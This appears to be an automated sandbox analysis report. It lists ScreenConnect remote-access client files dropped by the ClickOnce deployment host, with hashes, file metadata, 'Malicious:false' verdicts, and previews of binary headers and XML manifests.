                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1041
                                                                                                                                                                              Entropy (8bit):5.148278749531531
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0ApR7vNxW57FpS+iENg49vNxW5NgMiNg49vNxWO:JdFYZ8h9onRigeP0AqvSkcyMQcVSkTo
                                                                                                                                                                              MD5:9CE092E164085CE2566F654314BF99DC
                                                                                                                                                                              SHA1:ACEF36091EC262A4C42AA5A5B394C71B13B4767E
                                                                                                                                                                              SHA-256:6B36DDCE4021FD15C29CF63C7102E60EDFE2627D1B00EF97D0B4DE3051737439
                                                                                                                                                                              SHA-512:95BD7F9315DC181DE529D940E697B652651BC9E954E96FBC059998909259A719AF062548C533D24350C25A159CB113F568EB7C622AE3069CE25FB9224EBF02A6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61952
                                                                                                                                                                              Entropy (8bit):6.0424578422545006
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:7Sx8zDzYn1DruJCelbgZfBQeV8lsNEbgO:7Sx8z/uNruJv9wQeVXK
                                                                                                                                                                              MD5:22AF3A23BD30484514CDACF67C5B3810
                                                                                                                                                                              SHA1:E92A4EAEE9D896964DE541CE2F01C2404B638258
                                                                                                                                                                              SHA-256:7C5442121DBA2A30AB9579EC08E111DED372CF9CF90FB3256F273980B975AFA9
                                                                                                                                                                              SHA-512:95E40B27E90FCE7CA85E76AFBBC16EB62B4BB977664702B987DE2EB2294E6FE9E6DF5610EC7B2362C2C68493313F30FBBCBD3446DBE8AE2FA47B89407F5D5936
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h............" ..0.............B.... ... ....... .......................`.......l....@.....................................O.... .......................@......D...8............................................ ............... ..H............text...h.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................!.......H........f................................................................(....*^.(.......|...%...}....*:.(......}....*:.(......}....*:.(......}....*.~)...%-.&~(.....f...s....%.)...(...+*vs....%.}M.........s....(....*....0...........s....}.....s....}...........}.......($.....}.....(....&.('..........s....o.....('...~*...%-.&~(.....g...s....%.*...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s;...}....... ..6........s....s;...}.....(%...($............o%........

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll.genman

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1636
                                                                                                                                                                              Entropy (8bit):5.0848956029560135
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRzgeP0A2+vSkcyMQcbEMQcuMQcVSkcf5bdTo:3FYZ8h9o9gI0A2CHMQTMQ3MQGAXTo
                                                                                                                                                                              MD5:F94D041A8128BE81C4347CAF6A3C47BF
                                                                                                                                                                              SHA1:3285F9ACF70C0E4D34F888C28BD3F693E3DF5909
                                                                                                                                                                              SHA-256:91A65BACAD5F7F70BDDC6209ED65DD5C375CEF9F3C289EAB83FD90D622ADF46B
                                                                                                                                                                              SHA-512:90199543207CAF9B4501BE7E9509DC9526DAFCD5602AAED700314763021C8F3ED06D93A31A90A34CB19D4FB7184AA7D154B197F9E535657AEB9EB872DA377A41
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):95520
                                                                                                                                                                              Entropy (8bit):6.505299402844754
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:0g1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkg4T0HMc7Jxc:NhbNDxZGXfdHrX7rAc6myJkg4T0H/A
                                                                                                                                                                              MD5:DC615E9D8EC81CBF2E2452516373E5A0
                                                                                                                                                                              SHA1:EC83D37A4F45CAEB07B1605324D0315F959452E9
                                                                                                                                                                              SHA-256:E9AB064ED381C29A3930F75CA3E05605C6EE07F30A69C043F576A5461DE3BAFC
                                                                                                                                                                              SHA-512:82FE00447FB9785264DFB8032399ADF6D33D91D71058212D252742C9E5FD54F5A52F6BAF4FB05E95F9A4055057C60A33A7C1C642F18A6A4E045B49BE88FA5D9F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@..................................t....@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):531456
                                                                                                                                                                              Entropy (8bit):6.031735419537473
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:ZPpB0+E5A976t5puf9NTh/k4dKRYJUYg7N+earZ5Ghfn55AJ6m/JaXAQKx4kEYYo:dpq+Ezuf9N0RYJZPUI6
                                                                                                                                                                              MD5:B319407E807BE1A49E366F7F8EA7EE2A
                                                                                                                                                                              SHA1:B12197A877FB7E33B1CB5BA11B0DA5CA706581BA
                                                                                                                                                                              SHA-256:761B7E50BAA229E8AFCD9A50990D7F776DDB5ED1EA5FBB131C802E57CF918742
                                                                                                                                                                              SHA-512:DC497643790DC608DECE9C8FE7264EFEDD13724BD24C9BF28A60D848B405FDDEFB8337A60F3F32BB91518910E02C7A2AAF29FC32F86A464DFCAFA365526BDB7F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0............../... ...@....... ...............................8....@.................................1/..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................e/......H........2..(.............................................................{9...*..{:...*V.(;.....}9.....}:...*...0..A........ur.......4.,/(<....{9....{9...o=...,.(>....{:....{:...o?...*.*.*. ... )UU.Z(<....{9...o@...X )UU.Z(>....{:...oA...X*...0..b........r...p......%..{9......%qu....u...-.&.+...u...oB....%..{:......%qv....v...-.&.+...v...oB....(C...*..{D...*..{E...*V.(;.....}D.....}E...*.0..A........uw.......4.,/(<....{D....{D...o=...,.(>....{E....{E...o?...*.*.*. F.b# )UU.

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll.genman

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.130181995746891
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onR+geP0AKvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AGGVETDTo
                                                                                                                                                                              MD5:6DA6DC34636435E9C2BD1B5FF79091B5
                                                                                                                                                                              SHA1:61B6D8C16330FE9063F041BCC025C10DE82D876B
                                                                                                                                                                              SHA-256:98D4EDAA86468540D2D17EF17A9BCD7224B128099A51A8F92A65A88950DCB44C
                                                                                                                                                                              SHA-512:0BB929107ECFA257DFB2FF7B37955D8C2402287E989C015632A6292362858667A398AD0563103C1324A29585A8177AAA4BCE3C57D867735E40D2CC5C996BD5B9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1716224
                                                                                                                                                                              Entropy (8bit):6.635479721420864
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:ZSjm7Fj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUw:Sm7JkGYYpT0+TFiH7efP
                                                                                                                                                                              MD5:29454A0CB83F28C24805E9A70E53444A
                                                                                                                                                                              SHA1:334202965B07AB69F08B16FED0EE6C7274463556
                                                                                                                                                                              SHA-256:998CC3F9AF5BD41CCF0F9BE86192BBE20CDEC08A6FF73C1199E1364195A83E14
                                                                                                                                                                              SHA-512:62790920974A2F1B018D466AE3E3B5100006A3C8013F43BDB04AF7074CFE5D992CAAEB610DE2B1B72FF0E4ACF8762DB1513A4A0CF331F9A340AE0CE53C3BE895
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L............" ..0..(...........F... ...`....... ..............................lc....@..................................E..O....`.............................. E..8............................................ ............... ..H............text...(&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc..............................@..B.................E......H.......$...L...........p...0....D........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*f.{......(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L.......

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll.genman

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1982
                                                                                                                                                                              Entropy (8bit):5.056583067402645
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRbggeP0AovSkcyMQcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AkHMQGQAXRTFgTo
                                                                                                                                                                              MD5:1FB3A39063C9FBBC9252D1224CF8C89D
                                                                                                                                                                              SHA1:0F0622EB6205F515651E055C17D0067A94308721
                                                                                                                                                                              SHA-256:199C3F5089B07F1FB6CB343180620B2094BCDDA9E1F6A3F41269C56402D98439
                                                                                                                                                                              SHA-512:8C70FF2FE2F1935454AA6BB4CE0998DA1ADCBFE7219F1EAEE4688EE86BBC730DE30347F39B9B1413CBD345D1BF786491ED2F79142D9333DBA3A7F0EDC9F48E3A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61216
                                                                                                                                                                              Entropy (8bit):6.318400837211405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:0Ai+pmi/djqbv8DtYQ4RE+TC3l/ibU37DIx4:0Upmi1YQb1l3X
                                                                                                                                                                              MD5:10DBA57F22A6AB4039330000570F39F8
                                                                                                                                                                              SHA1:B8B5C65A89256177DA802C4C9CBD11B013221730
                                                                                                                                                                              SHA-256:9BD8D15759F83D99EDD1F2617D59A94E1C2BB4BD7C4977958F5D5F22C5A7C469
                                                                                                                                                                              SHA-512:38230B63A4630145608F619D75CA3115C05AB0338FB57566E012DF1BD157123A670A37AE0FEA92351AB7352319A5AF29F9DB3F8BB14962F3F0DE3A4F5A5B754C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."............"...0.............6.... ........@.. ....................... ............@.....................................O.......,............... )..........(...8............................................ ............... ..H............text...<.... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S...............................................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....("...*..0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o*...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):587040
                                                                                                                                                                              Entropy (8bit):6.166636022526366
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:npu96mzdjnwbrYQySjbs03fG+Yg2PgG7x:CpjpSjq77x
                                                                                                                                                                              MD5:5DEC65C4047DE914C78816B8663E3602
                                                                                                                                                                              SHA1:8807695EE8345E37EFEC43CBC0874277ED9B0A66
                                                                                                                                                                              SHA-256:71602F6B0B27C8B7D8AD624248E6126970939EFFDE785EC913ACE19052E9960E
                                                                                                                                                                              SHA-512:27B5DCB5B0AEADF246B91A173D06E5E8D6CF2CD19D86CA358E0A85B84CD9D8F2B26372EF34C3D427F57803D90F2E97CF59692C80C268A71865F08FC0E7CE42D1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...twP..........."...0.................. ........@.. .......................@.......a....@.....................................O....................... )... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........7......................`.........................................{F...*..{G...*V.(H.....}F.....}G...*...0..A........u,.......4.,/(I....{F....{F...oJ...,.(K....{G....{G...oL...*.*.*. }.o )UU.Z(I....{F...oM...X )UU.Z(K....{G...oN...X*...0..b........r...p......%..{F......%q/..../...-.&.+.../...oO....%..{G......%q0....0...-.&.+...0...oO....(P...*..{Q...*..{R...*V.(H.....}Q.....}R...*.0..A........u1.......4.,/(I....{Q....{Q...oJ...,.(K....{R....{R...oL...*.*.*. 1.c. )UU.

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.genman

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2573
                                                                                                                                                                              Entropy (8bit):5.02538862565643
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:3FYZ8h9o5gI0A7HMQAXQ3MQTMQRGTDBTo:1YiW4AIBvtI
                                                                                                                                                                              MD5:EFA59A7F55AF829C3974A02F30EBE80C
                                                                                                                                                                              SHA1:0FABA6763D910D5EE104E3457045C63CCC5BF79B
                                                                                                                                                                              SHA-256:3E2D5CC7867AFA23663D5894127CE6E2880D3075773A249B37576EDA5088875A
                                                                                                                                                                              SHA-512:72262B09C21DC4A2B2701A5B32C149349FA3107035D5A115EAC4335E3961DCF12A7A867AEFF595C13AA618EA955B604538C0F4E529CB6A76FFF0CB75927CC74D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.manifest

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17866
                                                                                                                                                                              Entropy (8bit):5.957264907751996
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:jeowfbgEfIaMLf6svxX9nCCX9FX9R/QPIYM7Y7:jF68xX9fX9FX9R/QPIN07
                                                                                                                                                                              MD5:F4B84E283123B025A90BBDE33E2080FD
                                                                                                                                                                              SHA1:CC57BFD02228BE76C6E08BDE16996FA992FF0E54
                                                                                                                                                                              SHA-256:93F9EB492B6952D8C7AA1EF1EE5A901234BA1FD2D5EF58D24E1FAEF597EA8E02
                                                                                                                                                                              SHA-512:ABC92965BF97C37A614B556D2219D06E63687777D79DF5FFB4B5D447DD138C160E5A45CAB76A2353D758AD62960F2E58745F0523881FF6C0EA4CCBCD7ED40002
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="23.9.10.8817" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="23.9.10.8817" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

